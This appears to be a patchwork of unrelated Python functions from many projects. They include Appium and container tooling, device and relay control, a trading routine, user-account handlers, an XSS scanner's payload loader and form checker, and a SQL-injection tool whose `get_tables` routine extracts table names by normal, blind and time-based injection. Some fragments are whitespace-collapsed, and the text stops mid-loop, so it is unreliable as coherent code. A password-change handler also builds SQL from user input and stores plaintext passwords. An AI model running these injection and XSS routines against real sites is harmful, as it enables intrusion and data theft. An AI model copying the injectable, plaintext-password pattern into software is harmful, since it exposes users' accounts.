def server(self):
    """Record each configured device's port and start a server for it.

    Iterates the entries of ``self.devices.get(self.device_type)``; each
    entry is read with ``.get('port')`` and then handed to
    ``self.server_commond``.
    """
    device_configs = self.devices.get(self.device_type)
    for device in device_configs:
        # Keep the port so that a later check can verify the service started.
        port = device.get('port')
        self.ports.append(port)
        logger.debug('配置参数:%s'%device)
        # The whole config dict travels under the single keyword ``kwargs``.
        launch_result = self.server_commond(kwargs=device)
def __del__(self):
    """Commit pending work and close the database connection on destruction."""
    # NOTE(review): finalizers are not guaranteed to run at interpreter exit,
    # so a commit placed here can be lost; an explicit close() is more reliable.
    connection = self.conn
    connection.commit()
    connection.close()
    logger.debug('destroy database object')
def kill_server(self):
    """Force-kill every ``node.exe`` process and log the command output.

    Original author's note (translated): if adb restarts, the emulator
    (presumably Nox) will no longer be found.

    :return: None
    """
    # /F forces termination, /IM selects by image name, /t includes child
    # processes. Selection is by image name only, so every Node.js process
    # on the host is terminated, not just the server started by this tool.
    taskkill_output = subprocess.getoutput("taskkill /F /IM node.exe /t")
    logger.debug('执行[KILL SERVER]操作:%s' % taskkill_output)
def payloads(file, rstr, rint, level):
    """Build the payload list from *file*, or from the bundled sets by *level*.

    With no *file*, ``data/basic.txt`` is always loaded; levels 2 and 3 add
    the body/img/div sets and level 3 also adds the svg/polyglot sets.
    *rstr* and *rint* are passed through to ``_open_file`` unchanged.
    """
    plist = []
    if file is not None:
        logger.info("Generating payloads for file %s..." % (file))
        plist = _open_file(file, plist, rstr, rint)
    else:
        logger.debug(
            "The payload file does not specify. Loading default payloads")
        logger.info("Generating payloads for level %s..." % (level))
        sources = ["data/basic.txt"]
        if level in (2, 3):
            sources.extend(["data/body.txt", "data/img.txt", "data/div.txt"])
        if level == 3:
            sources.extend(["data/svg.txt", "data/polyglot.txt"])
        # Load order matters: each call receives the list built so far.
        for source in sources:
            plist = _open_file(source, plist, rstr, rint)
    logger.info("%s payloads have been generated" % (len(plist)))
    return plist
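def handle(param):
    """Register a new user from *param* and return a status dict.

    *param* must provide ``username`` (an 11-digit number starting with
    13, 15, 16, 17 or 18) and ``password`` (at least 6 characters).

    Returns ``{'ret': 1, 'data': {'desc': 'ok'}}`` on success, otherwise
    ``{'ret': 0, 'data': {'desc': <reason>}}``.
    """
    username = param.get('username')
    passwd = param.get('password')
    if not username or not passwd:
        # This reply used the misspelled key 'date'; every other reply uses
        # 'data', so clients reading 'data' got nothing on this path.
        return {'ret': 0, 'data': {'desc': 'input error'}}
    # \Z instead of $: "$" also matches before a trailing newline, which
    # would let "13812345678\n" through as a valid username.
    if not re.match(r"^1[35678]\d{9}\Z", username):
        return {'ret': 0, 'data': {'desc': 'username is not phonenum'}}
    tmp = userstruct.read_mysql(username)
    # NOTE(review): this logs whatever read_mysql returns; confirm the record
    # does not carry the password field before leaving debug logging on.
    logger.debug(tmp)
    if tmp:
        return {'ret': 0, 'data': {'desc': 'username is exist'}}
    if len(passwd) < 6:
        return {'ret': 0, 'data': {'desc': 'passwd less 6'}}
    # NOTE(review): the password is stored exactly as received next to a
    # constant salt ('11'). It should be hashed with a password KDF and a
    # per-user random salt; that change has to be made together with the
    # login and password-change paths, so it is only flagged here.
    # NOTE(review): the exists-check above and this insert are not atomic;
    # a unique constraint on username is needed to reject concurrent signups.
    ret = sqlutil.InsertIntoDB(
        'userinfo', {'username': username, 'password': passwd, 'salt': '11'})
    if not ret:
        return {'ret': 0, 'data': {'desc': 'InsertIntoDB error'}}
    return {'ret': 1, 'data': {'desc': 'ok'}}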
def __accept(self, sock: socket):
    """Accept one pending connection on *sock* and start tracking it."""
    client, peer = sock.accept()
    logger.debug('accepted: {0}, from: {1}'.format(client, peer))
    # Non-blocking, then registered for read events with the selector.
    client.setblocking(False)
    self.__selector.register(client, EVENT_READ)
    # The Connection record is created with the accept time.
    accepted_at = time.time()
    self.__connections[client] = self.Connection(accepted_at)
    self.__connected(client)
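def handle(param):
    """Change a user's password after checking the session key and old password.

    Reads ``userid``, ``skey``, ``oldpwd`` and ``newpwd`` from *param*.
    Returns ``{'ret': 1, 'data': <user dict>}`` on success and
    ``{'ret': 0, 'data': {...}}`` otherwise.
    """
    userid = param.get('userid')
    skey = param.get('skey')
    oldpwd = param.get('oldpwd')
    newpwd = param.get('newpwd')
    # The session key is a credential: log who is calling, never the key.
    logger.info("%s", userid)
    if not (userid and skey and oldpwd):
        return {'ret': 0, 'data': {}}

    tmp = userstruct.read_redis(userid)
    if not tmp or tmp.skey != skey:
        return {'ret': 0, 'data': {'des': 'skey error'}}
    if tmp.password != oldpwd:
        return {'ret': 0, 'data': {'des': 'oldpwd error'}}
    if not userstruct.checkpwdfrt(newpwd):
        return {'ret': 0, 'data': {'des': 'newpwd format error'}}

    # userid is placed unquoted into the statement below, so only a plain
    # integer may reach it.
    try:
        userid_sql = int(userid)
    except (TypeError, ValueError):
        return {'ret': 0, 'data': {'des': 'userid error'}}

    # NOTE(review): newpwd is still formatted into the SQL text; whether a
    # quote can reach it depends entirely on what checkpwdfrt() accepts.
    # Use a parameterized call if sqlutil provides one. Passwords are also
    # stored and compared in plaintext here.
    # NOTE(review): the session key is not rotated after the change (the
    # rotation code was commented out in the original) and the cached record
    # in `tmp` is not updated with the new password.
    sqlutil.execsqlcommit(
        "UPDATE userinfo SET `password` = '%s' where userid = %s" % (newpwd, userid_sql))
    logger.debug(tmp)
    # NOTE(review): confirm todict() does not return password or skey fields.
    return {'ret': 1, 'data': tmp.todict()}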
def _do_basic_attack(self, method):
    """Find the page's forms and run the payload check on each one.

    *method* is the key under ``self._wrapUrl.kwargs`` that receives the
    form's inputs before ``_send_payload`` is called. Any exception raised
    while scanning is logged at debug level and ends the scan.
    """
    logger.info("Finding forms in the page..")
    forms = self.get_inputs()
    form_count = len(forms)

    if form_count == 0:
        logger.warn("There aren't forms to check.")
        logger.warn("Please, add more info to find anything.")
        return

    logger.info("Detected %s forms." % (form_count))
    try:
        for form in forms:
            logger.info("Checking XSS on form...")
            form_data = self.get_form_data(form)
            fields = form_data['inputs']
            if fields:
                self._wrapUrl.kwargs[method] = form_data['inputs']
                self._send_payload(fields, method)
            else:
                logger.warn("The form has no fields to check")
    except Exception as e:
        # Failures are only visible at debug level.
        logger.debug(e)
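def new_request(wrapUrl, timeout=None):
    """Send the request described by *wrapUrl*; return the response on HTTP 200.

    *timeout* overrides ``DEFAULT_TIMEOUT`` when given. Returns ``None``
    when the request raises or when the status code is not 200.
    """
    # Copy so the caller's kwargs are left untouched.
    kwargs = dict(wrapUrl.kwargs)
    method = kwargs['method']
    kwargs['timeout'] = timeout if timeout is not None else DEFAULT_TIMEOUT
    kwargs = define_request(wrapUrl._url, **kwargs)

    # Bound up front: previously a failed request left `request` unbound and
    # the status check in the `finally` clause raised UnboundLocalError in
    # place of the handled network error.
    request = None
    try:
        session = requests.Session()
        request = session.request(method, wrapUrl._url, **kwargs)
    except Exception as e:
        logger.debug(e)

    if request is None:
        return None
    if request.status_code != 200:
        logger.error("%s (%s)" % (request.reason, request.status_code))
        return None
    return request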
def update(self, *args, **kwargs):
    """Log the reading in ``args[0]``/``args[1]`` and advance or start.

    The two positional values are logged as kW and seconds. When the object
    is already started they are forwarded to ``next``; otherwise ``start``
    is called and the reading is not forwarded.
    """
    logger.debug("{0:.3f} kW ({1:.2f}s)".format(args[0], args[1]))
    if not self.is_started():
        # TODO: Find a better solution
        self.start()
        return
    self.next(args[0], args[1])
def open(self):
    """Register this socket as a log waiter and send it the relay state."""
    # NOTE(review): no authentication or origin check is visible in this
    # handler; confirm one is enforced elsewhere before relay data is sent.
    LogSocketHandler.waiters.add(self)
    logger.debug("WebSocket opened")
    relay_state = {
        'COMMAND': network_api.COM_RELAY,
        'STATUS': network_api.STA_RELOAD,
        'DATA': server.get_relays()
    }
    self.write_message(json_encode(relay_state))
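def get_node(self, name):
    """Return the cached node called *name*, creating and caching it if new."""
    if name in self.nodes:
        return self.nodes[name]
    L.debug("Connecting to remote manager node %s"%name)
    # `self.async = True` is a SyntaxError from Python 3.7 on, where `async`
    # is a reserved word; setattr() sets the same attribute on every version.
    setattr(self, 'async', True)
    node = Node(name)
    self.nodes[name] = node
    if not node.exists:
        # NOTE(review): both paths return the node, so a node that does not
        # exist is cached and returned like any other.
        return node
    return node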
def close_browser(browser):
    """Quit *browser*; errors from the driver are logged, never raised."""
    try:
        logger.info("Closing browser...")
        browser.quit()
    except Exception as error:
        # Best effort: a failed quit is only visible at debug level.
        for detail in ("Error to close browser", error):
            logger.debug(detail)
def getMothMountPath(self):
    """Query the mount path for ``self.device_path`` and cache it.

    Sets ``self.mount_path`` to the command output minus its last character
    when the command succeeded and returned more than 3 characters, else to
    ``None``. Returns the cached value.
    """
    # NOTE(review): device_path is formatted into a shell command; confirm it
    # can only contain a device name produced by this program.
    command = getMothMountPathCommand.format(self.device_path)
    raw_output, ok = output_shell(command)
    if ok and len(raw_output) > 3:
        # Drop the final character (presumably the trailing newline).
        self.mount_path = raw_output[:-1]
    else:
        self.mount_path = None
    logger.debug("getMothMountPath:{0}".format(self.mount_path))
    return self.mount_path
def open_order(self, day, type: str, asset: Asset, coins, price, stop_loss=0.01):
    """Open an order for *asset*, adjust its balances and persist the order.

    Returns ``(order, order_log)``, or ``None`` when ``can_open_order``
    refuses the order. *stop_loss* is a fraction of *price*; a falsy value
    stores no stop-loss price.
    """
    session = self.createSession()

    stop_price = price + (price * stop_loss) if stop_loss else None
    order = Order(
        symbol=asset.symbol,
        type=type,
        status=OrderStatus.OPEN,
        coins=coins,
        open_price=price,
        last_price=price,
        stop_loss=stop_price,
        open_at=day,
    )
    entry = OrderLog(symbol=asset.symbol,
                     type=order.type,
                     status=order.status,
                     price=price,
                     timestamp=day)

    # Refuse before touching any balance.
    if not self.can_open_order(asset, order):
        logger.debug("[Day {}] Cannot open order for {}".format(
            day, asset.symbol))
        return None

    # NOTE(review): balances are changed on the in-memory asset before the
    # commit below and are not restored if the commit fails; the session is
    # also never closed here.
    if order.type == OrderType.LONG:
        # Margin long: allowance is in fiat, coins are bought with lent fiat.
        asset.long_allowance -= order.open_price * order.coins
        asset.margin_coins += order.coins
        asset.long_orders += 1
    elif order.type == OrderType.SHORT:
        # Margin short: allowance is in coins, lent coins are sold at open price.
        asset.short_allowance -= order.coins
        asset.margin_fiat += order.coins * order.open_price
        asset.short_orders += 1
    elif order.type == OrderType.SPOT:
        # Spot: pay price plus opening fee from the fiat wallet, receive coins.
        asset.fiat -= order.open_price * order.coins + self.get_open_fee(order)
        asset.coins += order.coins
        asset.spot_orders += 1

    session.add(order)
    session.add(entry)
    session.commit()
    return order, entry
def discover(cls):
    """Import every module found in this package and cache them by name.

    Does nothing when ``cls.registered_modules`` is already populated.
    """
    if cls.registered_modules:
        return
    # Every module found under the package path is imported, i.e. executed;
    # write access to that directory is therefore code execution in this
    # process.
    prefix = __name__ + "."
    found = {}
    for _finder, name, _ispkg in pkgutil.iter_modules(__path__, prefix):
        found[name] = importlib.import_module(name)
    cls.registered_modules = found
    logger.debug("Available models: {}".format(
        cls.registered_modules.keys()))
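def cleanup_dead(self, name=None, id=None):
    """Force-remove stopped containers, optionally limited by name or id.

    With *id*, only the container whose ``Id`` equals it is considered; with
    *name*, only containers listing it in ``Names``. With neither, every
    stopped container is removed.
    """
    self.refresh_status()
    # The loop used to rebind `id` to the dict key, which discarded the
    # caller's id filter: cleanup_dead(id=X) could remove containers other
    # than X.
    for c in self.containers.values():
        if c['Running']:
            continue
        if id and id != c['Id']:
            continue
        if name and name not in c['Names']:
            continue
        self.client.remove_container(c['Id'], force=True)
        L.debug("Cleaned up dead container %s"%(c['Name'] or c['Id']))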
def resetMoth(self):
    """Restart the AudioMoth by holding its RST pin low for one second."""
    print("AudioMoth restarting")
    reset_pin = self.rst
    # Driving RST to ground forces the AudioMoth to restart.
    reset_pin.outputMode()
    reset_pin.low()
    time.sleep(1)
    # Closing the pin lets the reset complete.
    reset_pin.close()
    logger.debug("resetMoth")
def __init__(self, kilo_watt, switch_on, switch_off, gpio_pin, relay_number):
    """Store the relay's configuration; log the setup for a truthy number."""
    self.__relay_number = relay_number
    self.__gpio_pin = gpio_pin
    self.__kilo_watt = kilo_watt
    self.__switch_on = switch_on
    self.__switch_off = switch_off
    # A falsy relay number (0 or None) is set up without a log line.
    if self.__relay_number:
        logger.debug("Setup Relay {0}".format(self.__relay_number))
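def server_command(self, **kwargs):
    """Start an Appium server in the background for one device.

    Reads ``ip``, ``port``, ``udid`` and ``log_path`` from *kwargs*. The
    server's stdout is appended to ``log_path``. The process is not waited
    for and no handle to it is returned.
    """
    log_path = kwargs.get('log_path')
    command = 'appium -a {ip} -p {port} -U {udid} -g {log}'.format(
        ip=kwargs.get('ip'),
        port=kwargs.get('port'),
        udid=kwargs.get('udid'),
        log=log_path)
    logger.debug('启动服务执行的命令:%s' % command)
    # NOTE(review): the command line is run through the shell with the
    # values formatted in as-is, so shell metacharacters in any of them are
    # interpreted. The device configuration must come from a trusted source,
    # or each value must be validated before it gets here.
    # NOTE(review): stderr is piped but never read; a server that writes a
    # lot to stderr can block once the pipe buffer fills.
    # The child keeps its own copy of the log handle; closing ours fixes the
    # descriptor that was leaked on every call.
    with open(log_path, 'a+') as log_file:
        subprocess.Popen(command,
                         stdout=log_file,
                         stderr=subprocess.PIPE,
                         shell=True)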
def getMothDeviceName(self):
    """Query the AudioMoth device name and cache the name and device path.

    When the command succeeded and returned more than 3 characters, the
    name is the output minus its last character and the path is
    ``path_to_watch + '/' + name``; otherwise both are set to ``None``.
    Returns the cached name.
    """
    raw_name, ok = output_shell(getMothDeviceNameCommand)
    if ok and len(raw_name) > 3:
        # Drop the final character (presumably the trailing newline).
        self.device_name = raw_name[:-1]
        self.device_path = path_to_watch + '/' + raw_name[:-1]
    else:
        self.device_name = None
        self.device_path = None
    logger.debug("getMothDeviceName:{0}".format(self.device_name))
    return self.device_name
def is_mounted(self):
    """Refresh the mount path and report whether the device is mounted."""
    self.getMothMountPath()
    current_path = self.mount_path
    mounted = current_path is not None and len(current_path) > 3
    if not mounted:
        # Progress marker while polling: one "m" per failed check.
        print("m", end='', flush=True)
    else:
        print("AudioMoth device mounted at {0}".format(self.mount_path))
    logger.debug("is_mounted:{0}".format(mounted))
    return mounted
def __prev_state(self):
    """Step towards OFF: start the delay timer, or switch once it elapsed.

    Returns the previous state after the GPIO pin was switched off,
    otherwise ``self`` while the delay is still running.
    """
    now = time.perf_counter()
    if not (self.__relay_switch_to == _OFF) or self.__switch_timestamp == 0.0:
        # Target just changed to OFF (or no timer yet): (re)start the timer.
        self.__relay_switch_to = _OFF
        self.__switch_timestamp = now
    else:
        waited = now - self.__switch_timestamp
        if waited > self.__switch_off:
            GPIO.output(self.__gpio_pin, False)
            self.__relay_switch_is = _OFF
            return self.__return_state(self.prev)
    logger.debug("count = {0:>5.2f}, switch = {1:>5.2f}".format(
        now - self.__switch_timestamp, self.__switch_off))
    return self
def __next_state(self):
    """Step towards ON: start the delay timer, or switch once it elapsed.

    Returns the next state after the GPIO pin was switched on, otherwise
    ``self`` while the delay is still running.
    """
    now = time.perf_counter()
    if not (self.__relay_switch_to == _ON) or self.__switch_timestamp == 0.0:
        # Target just changed to ON (or no timer yet): (re)start the timer.
        self.__relay_switch_to = _ON
        self.__switch_timestamp = now
    else:
        waited = now - self.__switch_timestamp
        if waited > self.__switch_on:
            GPIO.output(self.__gpio_pin, True)
            self.__relay_switch_is = _ON
            return self.__return_state(self.next)
    logger.debug("count = {0:>5.2f}, switch = {1:>5.2f}".format(
        now - self.__switch_timestamp, self.__switch_on))
    return self
def is_detected(self):
    """Refresh the device name and report whether a device was detected."""
    self.getMothDeviceName()
    current_name = self.device_name
    detected = current_name is not None and len(current_name) > 3
    if not detected:
        # Progress marker while polling: one "d" per failed check.
        print("d", end='', flush=True)
        # The .format() call has no placeholder to fill; the message logged
        # is always "is_detected:-".
        logger.debug(f"is_detected:-".format(detected))
    else:
        print(
            f"AudioMoth device {self.device_name} detected at {self.device_path}"
        )
        logger.debug(f"is_detected: {self.device_name} {self.device_path}")
    return detected
def dump(self, username: str, include_root: bool, page_limit: int = 0):
    """Fetch the stars of every user *username* follows and commit them.

    With *include_root*, *username* itself is processed first. The first
    ``RuntimeError`` is logged as critical and stops the whole run.
    """
    targets = self.__fetch_followings_all(username)
    if include_root:
        targets = [username] + targets
    logger.debug(targets)

    # The loop variable is stored on the instance as self._following.
    for self._following in targets:
        logger.info(f"fetching following user: {self._following}")
        try:
            self.__fetch_stars_all(self._following, page_limit)
            logger.debug('saving changes to database')
            self.session.commit()
        except RuntimeError as e:
            logger.critical(str(e))
            break
def __fetch_followings_all(self, username):
    """Return the login of every user *username* follows, across all pages."""
    logins = []
    page_number = 1
    # Pages are requested until one comes back empty; there is no upper bound.
    while True:
        logger.debug(f"fetching following users: page {page_number}")
        page = self.__fetch_followings_by_page(username, page=page_number)
        if not page:
            return logins
        logins.extend(entry['login'] for entry in page)
        page_number += 1
def test_sever(self):
    """Block until ``netstat`` shows the first configured port; return True.

    The command is repeated every 5 seconds: any output means the server
    started, no output means it has not.
    """
    # NOTE(review): findstr matches substrings, so any netstat line that
    # merely contains these digits (another port, a PID) counts as success,
    # and the loop has no timeout if the server never starts. The port value
    # is also formatted into a shell pipeline.
    while True:
        listing = subprocess.getoutput('netstat -ano | findstr %s' % self.ports[0])
        if not listing:
            logger.debug('端口:【%s】 启动失败 5秒后重试' % self.ports[0])
            time.sleep(5)
            continue
        logger.debug('端口:【%s】 启动成功' % self.ports[0])
        break
    return True
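def get_inputs(self, input_type="form"):
    """Fetch the target page and return every *input_type* element in it.

    Returns an empty list when the page cannot be fetched.
    """
    try:
        request = get_forms_request(self._wrapUrl)
    except Exception as e:
        # Previously execution continued with `request` unbound and the
        # parse below raised NameError in place of the handled fetch error.
        logger.debug(e)
        return []
    if request is None:
        return []
    bs = BeautifulSoup(request.content, "html.parser")
    return list(bs.find_all(input_type))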
def read_shapefiles(paths, param):
    """Load the sub-region shapefile and derive the spatial parameters.

    Stores ``spatial_scope`` and ``Crd_all`` in *param*, then passes *param*
    through ``read_regions`` and ``read_EEZ`` and returns the result.
    """
    logger.info("Start")

    # Import the regions shapefile and reproject it to EPSG:4326.
    regions = gpd.read_file(paths["subregions"])
    regions = regions.to_crs(epsg=4326)

    scope = sf.define_spatial_scope(regions)
    param["spatial_scope"] = scope
    # Rectangle coordinates at the weather-data resolution.
    param["Crd_all"] = sf.crd_merra(param["spatial_scope"], param["res_weather"])

    param = read_regions(param, regions)
    param = read_EEZ(paths, param, regions)

    logger.debug("End")
    return param
def test(self, output=1):
    """Send ``self.payload`` once and record the response length if unset.

    The request goes out as GET or POST according to ``self.sqlirequest``;
    any other value logs an error and exits the process. With ``output``
    equal to 1 the response is printed.
    """
    request_kind = self.sqlirequest
    if request_kind not in ("GET", "POST"):
        logger.error("self.sqlirequest error...")
        exit(0)

    payload = self.dealpayload.construct_request(self.payload)
    if request_kind == "GET":
        r = self.Data.GetData(payload)
    else:
        r = self.Data.PostData(payload)

    # First use: take this response's length as the reference value.
    if self.len == 0:
        logger.debug("Set the parameters of the self.len...")
        self.len = len(r)
    if output == 1:
        print r
def download_translation(self, archive, timestamp, suite, component):
    """Download the repository's English Translation file if not yet local.

    A remote file that does not exist is logged as an error and skipped; a
    file already present under ``self.localdir`` is not downloaded again.
    """
    # NOTE(review): the four arguments become part of a local path without
    # normalisation; confirm they cannot contain ".." segments. No integrity
    # check of the downloaded file is visible here.
    translation_files = [
        f"/archive/{archive}/{timestamp}/dists/{suite}/{component}/i18n/Translation-en.bz2"
    ]
    for relative in translation_files:
        localfile = self.localdir + relative
        remotefile = f"{SNAPSHOT_DEBIAN}{relative}"
        logger.debug(remotefile)
        if not url_exists(remotefile):
            logger.error(f"Cannot find {remotefile}")
        elif not os.path.exists(localfile):
            self.download(localfile, remotefile)
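def schedule(self, nodes):
    """Return ``[node, cfg]`` pairs describing where to start this service.

    ``schedule`` in the service config selects the placement:
    ``one_per_node`` picks every node not yet running the service,
    ``spread`` (default) picks nodes round-robin until ``desired`` instances
    exist. Each cfg is a deep copy of the service config extended with ip,
    leader_ip, node, role, number, service and domain.
    """
    number = 0
    running = len(self.running(nodes))
    schedule = self.cfg.get('schedule', 'spread')
    scaling = self.cfg.get('scaling', 'swarm')
    desired = self.cfg.get('desired', 1)
    leader_ip = '127.0.0.1'
    # Materialised once: a dict view cannot be indexed on Python 3, which
    # made the round-robin below fail there.
    node_items = list(nodes.items())
    iternodes = []
    if schedule == 'one_per_node':
        iternodes = [(k, v) for (k, v) in node_items
                     if self.name not in v.running_services]
    elif schedule == 'spread':
        needed = desired - running
        L.debug("Swarm Scheduling: %s, desired=%d, running=%d"%(self.name, desired, running))
        # range() is empty for needed <= 0. With no nodes there is nothing
        # to place on; this used to raise ZeroDivisionError.
        if needed and node_items:
            iternodes = [node_items[n % len(node_items)] for n in range(needed)]
    schedules = []
    for name, node in iternodes:
        if scaling == 'raft':
            if running + number == 0:
                # The very first instance of a raft service is the leader.
                role = 'leader'
                leader_ip = node.ip
            else:
                # NOTE(review): when a leader is already running, leader_ip
                # stays at the '127.0.0.1' default for the new members.
                role = 'member'
        else:
            role = 'member'
        cfg = deepcopy(self.cfg)
        # Role-specific settings override the base config.
        if 'roles' in cfg and role in cfg['roles']:
            cfg.update(cfg['roles'][role])
        cfg.update({
            'ip': node.ip,
            'leader_ip': leader_ip,
            'node': name,
            'role': role,
            'number': number,
            'service': self.name,
            'domain': self.manager.cfg.get('domain', '%(manager_name)s.srvr.dj')%cfg,
        })
        schedules.append([node, cfg])
        number = number + 1
    return schedules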
def do(self):
    """Call the module-level ``do()`` and log that it ran."""
    # A disabled e-mail alert preceded this call in the original; if it is
    # re-enabled, the mail credentials must come from configuration, not
    # from literals in this file.
    # The name below resolves to the module-level do(), not to this method.
    do()
    logger.debug('doing')
def get_tables(self):
    # Enumerates the table names of every database in self.databases_name
    # and stores them as a tuple in self.tables_name[database_name].
    # self.sqlimethod selects one of three helpers (normal_injection,
    # build_injection, time_injection); each is asked for the table count,
    # then per table for the name length and the name.
    # For defenders: every query built here targets information_schema.tables
    # with COUNT(...), length(`table_name`) or ascii(substring(`table_name`,N,1))
    # filtered on table_schema, which is a usable detection pattern in query logs.
    # NOTE(review): nesting was reconstructed from a whitespace-collapsed
    # listing; confirm the placement of the last two statements upstream.

    # If databases_name is not set yet, enumerate the databases first.
    if len(self.databases_name) == 0:
        logger.debug("Set the parameters of the self.databases_name...")
        SqliDatabases.get_database(self)

    # One pass per database name.
    for database_name in self.databases_name:
        # Start working on this database.
        logger.debug("Start sqli databases %s's tables_name" % database_name)
        tables_name = []
        logger.debug("The sqlirequest is %s, start sqli tables..." % self.sqlirequest)

        if self.sqlimethod == "normal":
            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start table amount sqli...")

            # First the number of tables.
            tables_number = normal_injection(select='COUNT(*)',
                                             source="information_schema.tables",
                                             conditions="table_schema = '" + database_name + "'",
                                             dealpayload=self.dealpayload,
                                             data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                             )
            logger.debug("Table account sqli success...The tables_number is %d..." % tables_number)
            print "[*] tables_number: %d" % tables_number

            # One iteration per table.
            for i in trange(int(tables_number), desc="Table sqli...", leave=False, disable=True):
                # First the length of the table name.
                logger.debug("Start %dth table length sqli..." % (i + 1))
                table_name_len = normal_injection(select='length(`table_name`)',
                                                  source="information_schema.tables",
                                                  conditions="table_schema = '" + database_name + "'",
                                                  limit=i,
                                                  dealpayload=self.dealpayload,
                                                  data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                                  )
                logger.debug("%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len))
                logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len))

                # Then the table name itself.
                logger.debug("Start %dth table name sqli..." % (i + 1))
                table_name = normal_injection(select='`table_name`',
                                              source='information_schema.tables',
                                              conditions="table_schema = '" + database_name + "'",
                                              limit=i,
                                              dealpayload=self.dealpayload,
                                              data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
                                              )
                logger.debug("%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name))

                # Append the table name to the list.
                tables_name.append(table_name)
                logger.info("[*] %dth table_name: %s" % ((i + 1), table_name))

        elif self.sqlimethod == "build":
            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start table amount sqli...")

            retVal = build_injection(select="COUNT(`table_name`)",
                                     source="information_schema.tables",
                                     conditions="table_schema = '" + database_name + "'",
                                     dealpayload=self.dealpayload, data=self.Data,
                                     lens=self.len, isCount=True, sqlirequest=self.sqlirequest)
            tables_number = int(retVal)
            logger.debug("Tables amount sqli success...The tables_number is %d..." % tables_number)
            logger.info("[*] tables_number: %d" % tables_number)

            for i in range(0, int(tables_number)):
                # Length of the i-th table name.
                logger.debug("Start %dth table length sqli..." % (i + 1))
                retVal = build_injection(select="length(`table_name`)",
                                         source="information_schema.tables",
                                         conditions="table_schema = '" + database_name + "'",
                                         limit=i,
                                         dealpayload=self.dealpayload, data=self.Data,
                                         lens=self.len, isCount=True, sqlirequest=self.sqlirequest)
                table_name_len = int(retVal)
                logger.debug("%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len))
                logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len))

                # Then the table name, one character per request.
                # Reset table_name.
                table_name = ""
                logger.debug("Start %dth table sqli..." % (i + 1))
                for j in trange(int(table_name_len), desc='%dth Table sqli' % (i + 1), leave=False):
                    retVal = build_injection(select="ascii(substring(`table_name`," + repr(j + 1) + ",1))",
                                             source="information_schema.tables",
                                             conditions="table_schema = '" + database_name + "'",
                                             limit=i,
                                             dealpayload=self.dealpayload, data=self.Data,
                                             lens=self.len, isStrings=True, sqlirequest=self.sqlirequest)
                    table_name += chr(retVal)
                logger.debug("%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name))

                # Append the table name to the list.
                tables_name.append(table_name)
                logger.info("[*] %dth table_name: %s" % ((i + 1), table_name))

        elif self.sqlimethod == "time":
            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start table amount sqli...")

            retVal = time_injection(select="COUNT(`table_name`)",
                                    source="information_schema.tables",
                                    conditions="table_schema = '" + database_name + "'",
                                    dealpayload=self.dealpayload, data=self.Data,
                                    times=self.time, isCount=True, sqlirequest=self.sqlirequest)
            tables_number = int(retVal)
            logger.debug("Tables amount sqli success...The tables_number is %d..." % tables_number)
            logger.info("[*] tables_number: %d" % tables_number)

            for i in range(0, int(tables_number)):
                # Length of the i-th table name.
                logger.debug("Start %dth table length sqli..." % (i + 1))
                retVal = time_injection(select="length(`table_name`)",
                                        source="information_schema.tables",
                                        conditions="table_schema = '" + database_name + "'",
                                        limit=i,
                                        dealpayload=self.dealpayload, data=self.Data,
                                        times=self.time, isCount=True, sqlirequest=self.sqlirequest)
                table_name_len = int(retVal)
                logger.debug("%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len))
                logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len))

                # Then the table name, one character per request.
                # Reset table_name.
                table_name = ""
                logger.debug("Start %dth table sqli..." % (i + 1))
                for j in trange(int(table_name_len), desc='%dth Table sqli' % (i + 1), leave=False):
                    retVal = time_injection(select="ascii(substring(`table_name`," + repr(j + 1) + ",1))",
                                            source="information_schema.tables",
                                            conditions="table_schema = '" + database_name + "'",
                                            limit=i,
                                            dealpayload=self.dealpayload, data=self.Data,
                                            times=self.time, isStrings=True, sqlirequest=self.sqlirequest)
                    table_name += chr(retVal)
                logger.debug("%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name))

                # Append the table name to the list.
                tables_name.append(table_name)
                logger.info("[*] %dth table_name: %s" % ((i + 1), table_name))

        # Freeze this database's table list as a tuple.
        self.tables_name[database_name] = tuple(tables_name)
    print "[*] tables_name list: ", self.tables_name
# iterate through xml(s) for xml_report in nmap_xml_reports: try: # trying to load xml file nmap_report = NmapParser.parse_fromfile(xml_report) logger.info("%s host(s) loaded from %s" % (len(nmap_report.hosts), xml_report)) except Exception, e: logger.warn("XML file %s corrupted or format not recognized" % xml_report) # keep looking for others xml continue # start a cumulative dictionary results = nmap_combine(nmap_report, results) #print "results: %s" % len(results) logger.info("Wraping up results") for ip_address in results: # colecting info for each field open_ports = check_ports(results[ip_address]['Port/Protocol']) hostnames = list_to_str(results[ip_address]['Domains']) notes = results[ip_address]['Notes'] os, os_version = fingerprint_decision(results[ip_address]['Operating System'], results[ip_address]['Port/Protocol']) #print ip_address, results[ip_address]['Operating System'] # write down to the final report file writer.writerow({'IP Address': ip_address, 'Port/Protocol': open_ports, 'Domains': hostnames, 'Operating System': os, 'OS Version': os_version, 'Notes': notes}) logger.debug("%s,%s,%s,%s,%s,%s" % (ip_address, open_ports, hostnames, os, os_version, notes)) logger.info("Done: %s" % csv_filename) sys.exit(0)
def play_by_schedule(self, node, schedule):
    # Start the container described by `schedule` on `node` unless one with
    # the same name is already running. The schedule dict is modified in
    # place (leader_ip and container_name are written into it).
    s = schedule
    # ip, name, role and number are read but not used further in this method.
    ip = s['ip']
    name = s['node']
    role = s.get('role', None)
    number = s.get('number', None)
    s['leader_ip'] = self.leader_ip
    # The container name is a %-template filled from the schedule itself.
    s['container_name'] = container_name = s.get('container_name', '%(service)s.%(node)s.%(domain)s')%(s)
    labels = {'service': s['service']}
    labels.update(s.get('labels',{}))
    ports = map(str, s.get('ports', []))
    dynamic = map(str, s.get('dynamic_ports', []))
    expose = []
    bind = {}
    # Static ports: "[host:]container[/proto]", proto one of tcp (default),
    # udp or both. Each is bound on node.ip at the given host port.
    for p in ports:
